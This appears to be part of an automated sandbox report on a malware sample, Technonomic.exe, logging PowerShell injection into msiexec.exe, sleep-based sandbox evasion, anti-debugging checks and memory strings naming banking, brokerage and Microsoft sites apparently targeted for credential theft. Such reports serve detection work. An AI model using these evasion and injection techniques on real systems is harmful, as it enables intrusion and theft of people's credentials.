            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594999Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594671Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5431Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4308Jump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -26747778906878833s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2308Thread sleep count: 1132 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -599751s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2308Thread sleep count: 8726 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -599625s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -599515s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -599406s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -599297s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -599187s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -599078s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -598844s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -598711s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -598609s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -598500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -598390s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -598280s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -598172s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -598062s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -597843s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -597734s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -597625s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -597515s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -597297s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -597187s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -597073s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -596640s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -596531s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -596422s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -596312s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -596203s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -596093s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -595984s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -595875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -595765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -595656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -595547s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -595437s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -595328s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -595218s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -595109s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -594999s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -594890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -594781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -594671s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2632Thread sleep time: -594562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405974
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_004064C6 FindFirstFileW,FindClose,0_2_004064C6
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599751Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598711Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598609Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598500Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598280Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598172Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598062Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597073Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596312Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596093Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594999Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594671Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: msiexec.exe, 00000007.00000002.2606714921.0000000009F14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: msiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2581d8da2c05<
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
            Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2606714921.0000000009EAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd2558e4eafe83<
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: msiexec.exe, 00000007.00000002.2621544953.0000000026B9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: msiexec.exe, 00000007.00000002.2621544953.000000002687A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Users\user\Desktop\Technonomic.exeAPI call chain: ExitProcess graph end nodegraph_0-3613
            Source: C:\Users\user\Desktop\Technonomic.exeAPI call chain: ExitProcess graph end nodegraph_0-3605
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_032A5362 LdrInitializeThunk,7_2_032A5362
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4540000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
